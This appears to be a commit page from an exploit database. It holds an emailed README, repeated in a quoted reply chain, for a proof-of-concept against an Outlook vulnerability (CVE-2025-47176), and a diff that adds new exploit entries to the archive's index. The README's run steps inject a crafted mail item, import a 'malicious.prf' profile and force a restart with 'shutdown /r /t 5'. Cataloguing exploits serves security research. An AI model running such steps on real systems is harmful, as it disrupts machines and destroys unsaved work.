This PoC simulates the vulnerable Outlook path parsing and triggers a
**system restart** when the malicious path is detected.
---
## Additional Testing with malicious.prf
You can also test this PoC by importing a crafted Outlook Profile File
(`malicious.prf`):
1. Place `malicious.prf` in the same folder as `PoC.py`.
2. Run Outlook with the import command:
```powershell
& "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
/importprf malicious.prf
## Usage
1. Ensure you have Outlook installed and configured on your Windows machine.
2. Run the PoC script with Python 3.x (requires `pywin32` package):
```powershell
pip install pywin32
python PoC.py
```
3. The script will:
- Inject a mail item with the malicious sync path.
- Wait 10 seconds for Outlook to process the mail.
- Scan Inbox and Drafts folders.
- Upon detection, normalize the path and trigger a system restart
(`shutdown /r /t 5`).
---
## Warning
- This script **will restart your computer** after 5 seconds once the
payload is triggered.
- Save all work before running.
- Test only in a controlled or virtualized environment.
- Do **NOT** run on production or important systems.
---
## Files
- `PoC.py` - The Python proof-of-concept script.
- `README.md` - This file.
---
## License
This PoC is provided for educational and research purposes only.
Use responsibly and ethically.
# Video:
[href](https://www.youtube.com/watch?v=nac3kUe_d1c)
# Source:
[href](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-47176)
# Buy me a coffee if you are not ashamed:
[href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)
# Time spent:
03:35:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
На нд, 6.07.2025г. в 10:34 nu11 secur1ty <nu11secur1typentest@gmail.com>
написа:
> # Titles: Microsoft Outlook Remote Code Execution Vulnerability - ACE
> # Author: nu11secur1ty
> # Date: 07/06/2025
> # Vendor: Microsoft
> # Software: https://www.microsoft.com/en-us/microsoft-365/outlook/log-in
> # Reference:
> https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47176 >
> https://www.cloudflare.com/learning/security/what-is-remote-code-execution/
> # CVE-2025-47176
>
> ## Description
> This proof-of-concept (PoC) demonstrates the CVE-2025-47176 vulnerability
> simulation. It injects a crafted mail item into Outlook containing a
> malicious sync path that triggers an action during scanning.
>
> **IMPORTANT:**
> This PoC simulates the vulnerable Outlook path parsing and triggers a
> **system restart** when the malicious path is detected.
>
> ---
> ## Additional Testing with malicious.prf
>
> You can also test this PoC by importing a crafted Outlook Profile File
> (`malicious.prf`):
>
> 1. Place `malicious.prf` in the same folder as `PoC.py`.
> 2. Run Outlook with the import command:
>
> ```powershell
> & "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
> /importprf malicious.prf
>
>
> ## Usage
>
> 1. Ensure you have Outlook installed and configured on your Windows
> machine.
> 2. Run the PoC script with Python 3.x (requires `pywin32` package):
> ```powershell
> pip install pywin32
> python PoC.py
> ```
> 3. The script will:
> - Inject a mail item with the malicious sync path.
> - Wait 10 seconds for Outlook to process the mail.
> - Scan Inbox and Drafts folders.
> - Upon detection, normalize the path and trigger a system restart
> (`shutdown /r /t 5`).
>
> ---
>
> ## Warning
>
> - This script **will restart your computer** after 5 seconds once the
> payload is triggered.
> - Save all work before running.
> - Test only in a controlled or virtualized environment.
> - Do **NOT** run on production or important systems.
>
> ---
>
> ## Files
>
> - `PoC.py` - The Python proof-of-concept script.
> - `README.md` - This file.
>
> ---
>
> ## License
>
> This PoC is provided for educational and research purposes only.
>
> Use responsibly and ethically.
>
>
> # Reproduce:
> [href](https://www.youtube.com/watch?v=yOra0pm8CHg)
>
> # Source:
> [href](
> https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-47176)
>
> # Buy me a coffee if you are not ashamed:
> [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)
>
> # Time spent:
> 03:35:00
>
>
> --
> System Administrator - Infrastructure Engineer
> Penetration Testing Engineer
> Exploit developer at https://packetstormsecurity.com/
> https://cve.mitre.org/index.html
> https://cxsecurity.com/ and https://www.exploit-db.com/
> 0day Exploit DataBase https://0day.today/
> home page: https://www.nu11secur1ty.com/
> hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
> nu11secur1ty <http://nu11secur1ty.com/>
>
> На нд, 6.07.2025г. в 9:53 nu11 secur1ty <nu11secur1typentest@gmail.com>
> написа:
>
>> # Titles: Microsoft Outlook Remote Code Execution Vulnerability - ACE
>> # Author: nu11secur1ty
>> # Date: 07/06/2025
>> # Vendor: Microsoft
>> # Software: https://www.microsoft.com/en-us/microsoft-365/outlook/log-in
>> # Reference:
>> https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47176 >
>> https://www.cloudflare.com/learning/security/what-is-remote-code-execution/
>> # CVE-2025-47176
>>
>> ## Description
>> This proof-of-concept (PoC) demonstrates the CVE-2025-47176 vulnerability
>> simulation. It injects a crafted mail item into Outlook containing a
>> malicious sync path that triggers an action during scanning.
>>
>> **IMPORTANT:**
>> This PoC simulates the vulnerable Outlook path parsing and triggers a
>> **system restart** when the malicious path is detected.
>>
>> ---
>> ## Additional Testing with malicious.prf
>>
>> You can also test this PoC by importing a crafted Outlook Profile File
>> (`malicious.prf`):
>>
>> 1. Place `malicious.prf` in the same folder as `PoC.py`.
>> 2. Run Outlook with the import command:
>>
>> ```powershell
>> & "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
>> /importprf malicious.prf
>>
>>
>> ## Usage
>>
>> 1. Ensure you have Outlook installed and configured on your Windows
>> machine.
>> 2. Run the PoC script with Python 3.x (requires `pywin32` package):
>> ```powershell
>> pip install pywin32
>> python PoC.py
>> ```
>> 3. The script will:
>> - Inject a mail item with the malicious sync path.
>> - Wait 10 seconds for Outlook to process the mail.
>> - Scan Inbox and Drafts folders.
>> - Upon detection, normalize the path and trigger a system restart
>> (`shutdown /r /t 5`).
>>
>> ---
>>
>> ## Warning
>>
>> - This script **will restart your computer** after 5 seconds once the
>> payload is triggered.
>> - Save all work before running.
>> - Test only in a controlled or virtualized environment.
>> - Do **NOT** run on production or important systems.
>>
>> ---
>>
>> ## Files
>>
>> - `PoC.py` - The Python proof-of-concept script.
>> - `README.md` - This file.
>>
>> ---
>>
>> ## License
>>
>> This PoC is provided for educational and research purposes only.
>>
>> Use responsibly and ethically.
>>
>>
>> # Reproduce:
>> [href](https://www.youtube.com/watch?v=yOra0pm8CHg)
>>
>> # Buy me a coffee if you are not ashamed:
>> [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)
>>
>> # Time spent:
>> 03:35:00
>>
>>
>> --
>> System Administrator - Infrastructure Engineer
>> Penetration Testing Engineer
>> Exploit developer at https://packetstormsecurity.com/
>> https://cve.mitre.org/index.html
>> https://cxsecurity.com/ and https://www.exploit-db.com/
>> 0day Exploit DataBase https://0day.today/
>> home page: https://www.nu11secur1ty.com/
>> hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
>> nu11secur1ty <http://nu11secur1ty.com/>
>>
>> --
>>
>> System Administrator - Infrastructure Engineer
>> Penetration Testing Engineer
>> Exploit developer at https://packetstorm.news/
>> https://cve.mitre.org/index.html
>> https://cxsecurity.com/ and https://www.exploit-db.com/
>> 0day Exploit DataBase https://0day.today/
>> home page: https://www.nu11secur1ty.com/
>> hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
>> nu11secur1ty <http://nu11secur1ty.com/>
>>
>
>
> --
>
> System Administrator - Infrastructure Engineer
> Penetration Testing Engineer
> Exploit developer at https://packetstorm.news/
> https://cve.mitre.org/index.html
> https://cxsecurity.com/ and https://www.exploit-db.com/
> 0day Exploit DataBase https://0day.today/
> home page: https://www.nu11secur1ty.com/
> hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
> nu11secur1ty <http://nu11secur1ty.com/>
>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

8
files_exploits.csv
View file

@ -7803,6 +7803,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42183,exploits/linux/local/42183.c,"Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Escalation",2017-06-14,"Qualys Corporation",local,linux,,2017-06-15,2017-06-20,0,CVE-2017-1000367,,Linux_sudo_CVE-2017-1000367.c,,,http://seclists.org/oss-sec/2017/q2/470
48052,exploits/linux/local/48052.sh,"Sudo 1.8.25p - 'pwfeedback' Buffer Overflow",2020-02-06,"Dylan Katz",local,linux,,2020-02-11,2020-08-20,0,CVE-2019-18634,,,,,https://github.com/Plazmaz/CVE-2019-18634/blob/b348e738a83fd4180b3ec26ed216535547f3bb8a/self-contained.sh
47502,exploits/linux/local/47502.py,"sudo 1.8.27 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux,,2019-10-15,2021-12-17,0,CVE-2019-14287,,,,,
52354,exploits/linux/local/52354.txt,"Sudo 1.9.17 Host Option - Elevation of Privilege",2025-07-08,"Rich Mirch",local,linux,,2025-07-08,2025-07-08,0,CVE-2025-32462,,,,,
52352,exploits/linux/local/52352.txt,"Sudo chroot 1.9.17 - Local Privilege Escalation",2025-07-08,Stratascale,local,linux,,2025-07-08,2025-07-08,0,CVE-2025-32463,,,,,
26498,exploits/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",local,linux,,2005-11-11,2013-07-01,1,CVE-2005-4158;OSVDB-20764,,,,,https://www.securityfocus.com/bid/15394/info
319,exploits/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,local,linux,,1996-02-12,,1,OSVDB-61460,,,,,
470,exploits/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission",2004-09-21,"Angelo Rosiello",local,linux,,2004-09-20,2016-03-30,1,OSVDB-10023;CVE-2004-1689,,,,http://www.exploit-db.comsudo-1.6.8.tar.gz,
@ -10492,6 +10494,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,,2018-02-08,2018-02-08,0,,,,,,http://www.lynxsecurity.io/releases/Local%20File%20Disclosure%20in%20Marked2.pdf
19796,exploits/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",local,multiple,,2000-03-03,2012-07-13,1,CVE-2000-0172;OSVDB-5268,,,,,https://www.securityfocus.com/bid/1038/info
49491,exploits/multiple/local/49491.py,"Metasploit Framework 6.0.11 - msfvenom APK template command injection",2021-01-28,"Justin Steven",local,multiple,,2021-01-28,2021-01-28,0,CVE-2020-7384,,,,,
52355,exploits/multiple/local/52355.txt,"Microsoft Defender for Endpoint (MDE) - Elevation of Privilege",2025-07-08,"Rich Mirch",local,multiple,,2025-07-08,2025-07-08,0,CVE-2025-47161,,,,,
51359,exploits/multiple/local/51359.txt,"Microsoft Edge (Chromium-based) Webview2 1.0.1661.34 - Spoofing",2023-04-10,nu11secur1ty,local,multiple,,2023-04-10,2023-04-10,0,CVE-2023-24892,,,,,
51571,exploits/multiple/local/51571.txt,"Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure",2023-07-06,nu11secur1ty,local,multiple,,2023-07-06,2023-07-19,0,CVE-2023-33145,,,,,
48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,,2020-03-18,2020-03-18,0,,,,,,https://github.com/doyensec/VSCode_PoC_Oct2019/tree/19f09e5cf4bfcad500f9238748fb34d07284fa4f
@ -11522,6 +11525,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15298,exploits/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",remote,multiple,,2010-10-21,2015-04-21,0,OSVDB-68821;OSVDB-68820;OSVDB-68819;OSVDB-68818,,,,,
24246,exploits/multiple/remote/24246.txt,"SCI Photo Chat 3.4.9 - Cross-Site Scripting",2004-07-20,"Donato Ferrante",remote,multiple,,2004-07-20,2013-01-20,1,CVE-2004-0673;OSVDB-7473,,,,,https://www.securityfocus.com/bid/10648/info
46193,exploits/multiple/remote/46193.py,"SCP Client - Multiple Vulnerabilities (SSHtranger Things)",2019-01-18,"Mark E. Haase",remote,multiple,,2019-01-18,2019-01-18,0,CVE-2019-6111;CVE-2019-6110,,"SSHtranger Things",,,https://gist.github.com/mehaase/63e45c17bdbbd59e8e68d02ec58f4ca2
52353,exploits/multiple/remote/52353.py,"ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)",2025-07-08,"Alexandre ZANNI",remote,multiple,,2025-07-08,2025-07-08,0,CVE-2025-47228,,,,,
4761,exploits/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,remote,multiple,25,2007-12-20,2016-12-04,1,CVE-2007-4560,,,,,
34439,exploits/multiple/remote/34439.txt,"ServletExec - Directory Traversal / Authentication Bypass",2010-08-12,"Stefano Di Paola",remote,multiple,,2010-08-12,2014-08-28,1,,,,,,https://www.securityfocus.com/bid/42411/info
23756,exploits/multiple/remote/23756.txt,"Seyeon Technology FlexWATCH Server 2.2 - Cross-Site Scripting",2004-02-24,"Rafel Ivgi The-Insider",remote,multiple,,2004-02-24,2012-12-30,1,,,,,,https://www.securityfocus.com/bid/9739/info
@ -11922,6 +11926,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31686,exploits/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,webapps,multiple,80,2014-02-16,2014-02-16,1,OSVDB-103387,,,,,
45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,,2018-07-11,2018-07-13,1,,Traversal,,http://www.exploit-db.com/screenshots/idlt45500/45007.png,,
33759,exploits/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,webapps,multiple,,2010-03-14,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38721/info
52358,exploits/multiple/webapps/52358.py,"Discourse 3.2.x - Anonymous Cache Poisoning",2025-07-08,İbrahimsql,webapps,multiple,,2025-07-08,2025-07-08,0,CVE-2024-47773,,,,,
49752,exploits/multiple/webapps/49752.html,"DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)",2021-04-08,"Issac Briones",webapps,multiple,,2021-04-08,2021-04-08,0,CVE-2021-30147,,,,,
48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,,2020-07-22,2020-07-22,0,CVE-2020-7680,,,,,
33764,exploits/multiple/webapps/33764.txt,"Dojo Toolkit 1.4.1 - '/dijit/tests/_testCommon.js?theme' Cross-Site Scripting",2010-03-15,"Adam Bixby",webapps,multiple,,2010-03-15,2017-11-24,1,CVE-2010-2275;OSVDB-63073,,,,,https://www.securityfocus.com/bid/38739/info
@ -12430,6 +12435,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51218,exploits/multiple/webapps/51218.txt,"SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS)",2023-04-03,geeklinuxman,webapps,multiple,,2023-04-03,2023-04-03,0,CVE-2022-47870,,,,,
17174,exploits/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - (Authenticated) Local File Inclusion / Edit",2011-04-15,bitform,webapps,multiple,,2011-04-15,2011-04-15,1,,,,,http://www.exploit-db.comsql-ledger-2.8.33.tar.gz,
24320,exploits/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection",2013-01-24,RealGame,webapps,multiple,,2013-01-24,2018-03-15,1,OSVDB-89701,,,,http://www.exploit-db.comSQliteManager-1.2.4.tar.gz,
52357,exploits/multiple/webapps/52357.txt,"Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover",2025-07-08,stealthcopter,webapps,multiple,,2025-07-08,2025-07-08,0,CVE-2024-50477,,,,,
50237,exploits/multiple/webapps/50237.py,"Strapi 3.0.0-beta - Set Password (Unauthenticated)",2021-08-30,"David Anglada",webapps,multiple,,2021-08-30,2021-08-30,0,CVE-2019-18818,,,,,
50238,exploits/multiple/webapps/50238.py,"Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)",2021-08-30,"David Utón",webapps,multiple,,2021-08-30,2021-08-30,0,CVE-2019-19609,,,,,
50239,exploits/multiple/webapps/50239.py,"Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-30,"Musyoka Ian",webapps,multiple,,2021-08-30,2021-08-30,0,,,,,,
@ -44532,6 +44538,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
32339,exploits/windows/remote/32339.txt,"Microsoft Organization Chart 2 - Remote Code Execution",2008-09-08,"Ivan Sanchez",remote,windows,,2008-09-08,2014-03-19,1,CVE-2008-3956;OSVDB-48000,,,,,https://www.securityfocus.com/bid/31059/info
16700,exploits/windows/remote/16700.rb,"Microsoft Outlook - 'ATTACH_BY_REF_ONLY' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-10,1,CVE-2010-0266;OSVDB-66296;MS10-045,"Metasploit Framework (MSF)",,,,http://www.akitasecurity.nl/advisory.php?id=AK20091001
16699,exploits/windows/remote/16699.rb,"Microsoft Outlook - 'ATTACH_BY_REF_RESOLVE' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-10,1,CVE-2010-0266;OSVDB-66296;MS10-045,"Metasploit Framework (MSF)",,,,http://www.akitasecurity.nl/advisory.php?id=AK20091001
52356,exploits/windows/remote/52356.txt,"Microsoft Outlook - Remote Code Execution (RCE)",2025-07-08,nu11secur1ty,remote,windows,,2025-07-08,2025-07-08,0,,,,,,
20571,exploits/windows/remote/20571.txt,"Microsoft Outlook 2000 0/98 0/Express 5.5 - Concealed Attachment",2001-01-17,http-equiv,remote,windows,,2001-01-17,2012-08-27,1,OSVDB-85833,,,,,https://www.securityfocus.com/bid/2260/info
23796,exploits/windows/remote/23796.html,"Microsoft Outlook 2002 - 'Mailto' Quoting Zone Bypass",2004-03-09,shaun2k2,remote,windows,,2004-03-09,2013-01-01,1,CVE-2004-0121;OSVDB-4168,,,,,https://www.securityfocus.com/bid/9827/info
24114,exploits/windows/remote/24114.html,"Microsoft Outlook 2003 - Mail Client E-mail Address Verification",2004-05-11,http-equiv,remote,windows,,2004-05-11,2013-01-15,1,CVE-2004-0501;OSVDB-6079,,,,,https://www.securityfocus.com/bid/10323/info
@ -44565,6 +44572,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28226,exploits/windows/remote/28226.c,"Microsoft PowerPoint 2003 - '.ppt' File Closure Memory Corruption",2006-07-14,"naveed afzal",remote,windows,,2006-07-14,2013-09-12,1,CVE-2006-3656;OSVDB-27327,,,,,https://www.securityfocus.com/bid/18993/info
28224,exploits/windows/remote/28224.c,"Microsoft PowerPoint 2003 - 'mso.dll' '.PPT' Processing Code Execution",2006-07-14,"naveed afzal",remote,windows,,2006-07-14,2013-09-12,1,CVE-2006-3655;OSVDB-27325,,,,,https://www.securityfocus.com/bid/18993/info
28225,exploits/windows/remote/28225.c,"Microsoft PowerPoint 2003 - 'powerpnt.exe' Remote Overflow",2006-07-14,"naveed afzal",remote,windows,,2006-07-14,2017-11-22,1,CVE-2006-3660;OSVDB-27326,,,,,https://www.securityfocus.com/bid/18993/info
52351,exploits/windows/remote/52351.py,"Microsoft PowerPoint 2019 - Remote Code Execution (RCE)",2025-07-08,"Mohammed Idrees Banyamer",remote,windows,,2025-07-08,2025-07-08,0,CVE-2025-47175,,,,,
16334,exploits/windows/remote/16334.rb,"Microsoft Private Communications Transport - Remote Overflow (MS04-011) (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-07,1,CVE-2003-0719;OSVDB-5250;MS04-011,"Metasploit Framework (MSF)",,,,
4874,exploits/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method",2008-01-09,shinnai,remote,windows,,2008-01-08,2016-11-14,1,CVE-2008-0237,,,,,
16749,exploits/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)",2011-01-11,Metasploit,remote,windows,,2011-01-11,2011-03-06,1,CVE-2003-0352;OSVDB-2100;MS03-026,"Metasploit Framework (MSF)",,,,

Can't render this file because it is too large.